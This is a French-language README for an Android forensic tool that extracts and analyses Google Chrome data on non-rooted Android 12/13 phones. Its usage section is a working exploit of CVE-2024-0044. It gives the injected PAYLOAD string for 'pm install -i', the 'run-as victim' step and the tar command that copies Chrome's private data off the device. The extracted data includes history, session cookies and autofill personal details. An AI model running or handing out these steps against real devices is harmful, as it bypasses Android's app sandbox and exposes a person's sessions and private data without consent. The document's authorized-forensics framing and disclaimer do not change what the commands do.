
Un outil robuste de criminalistique numérique pour extraire et analyser les artefacts de Google Chrome depuis des appareils Android.
Un outil robuste de criminalistique numérique pour extraire et analyser les artefacts Google Chrome depuis des appareils Android
Fonctionnalités • Installation • Utilisation • Documentation
Auteur : JackTekno
GitHub : github.com/JackTekno
Cet outil exploite la vulnérabilité CVE-2024-0044 (Run-as) pour contourner les restrictions de permissions sur les appareils Android 12/13 non rootés, permettant l'extraction judiciaire des données de Google Chrome. L'outil analyse les bases de données SQLite brutes et génère des rapports d'analyse complets.

Flux de travail complet de l'analyse judiciaire, de l'acquisition au rapport
L'outil génère un rapport Excel complet (result_chrome_forensic.xlsx) avec les feuilles suivantes :
F-Droid.apk)Cloner le dépôt
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
Installer les dépendances
pip install -r requirements.txt
# Envoyer un APK factice dans un dossier temporaire
adb push F-Droid.apk /data/local/tmp/base.apk
adb shell pm list packages -U | grep com.android.chrome
# Exemple de sortie : package:com.android.chrome uid:10129
# Notez l'UID (ex. 10129)
⚠️ Remplacez
10129par l'UID réel de Chrome obtenu à l'étape 3
adb shell
# Dans le shell ADB :
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Déclencher le gestionnaire de paquets
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
# Toujours dans le shell ADB
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# Quitter le shell ADB
exit
adb pull /data/local/tmp/chrome.tar .
Extrayez le fichier 'chrome.tar' dans le dossier du projet. Vous n'avez pas besoin de déplacer les fichiers manuellement. Le script Python trouvera automatiquement les fichiers de base de données dans les dossiers extraits.
tar -xf chrome.tar
Exécutez l'outil d'analyse judiciaire :
python3 chrome_forensic.py
L'outil analysera les fichiers de base de données et générera result_chrome_forensic.xlsx dans le même répertoire.
⚠️ IMPORTANT : Cet outil est conçu uniquement à des fins d'analyse judiciaire éducative et autorisée.
- Utilisez-le uniquement sur des appareils vous appartenant ou pour lesquels vous disposez d'une autorisation écrite explicite
- L'accès non autorisé à des appareils numériques peut enfreindre les lois de votre pays
- Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de cet outil
Les contributions sont les bienvenues ! N'hésitez pas à soumettre une Pull Request.
Ce projet est sous licence GNU General Public License v3.0. Consultez le fichier LICENSE pour plus de détails.
La preuve de concept de la méthode d'acquisition a été résumée et partagée par Tinyhack.com.
Réalisé avec ❤️ par JackTekno
⭐ Donner une étoile à ce dépôt • 🐛 Signaler un bug • 💡 Proposer une fonctionnalité
| Nom de la feuille | Description |
|---|
| 📖 Historique de navigation | Chronologie détaillée des URL visitées |
| 📈 Analytique – Sites les plus visités | Classement statistique des domaines les plus fréquentés |
| ⚠️ ALERTES – Suspects | URL signalées automatiquement (hacking, drogues, contenu adulte) |
| 📥 Téléchargements | Historique des téléchargements avec chemins et tailles |
| 🔍 Termes de recherche | Requêtes de recherche de l'utilisateur dans l'omnibox/Google |
| 🍪 Cookies & Sessions | Jetons de session et métadonnées des cookies (chiffrés en hexadécimal) |
| ✍️ Données de saisie automatique | Données de formulaires enregistrées (noms, adresses, etc.) |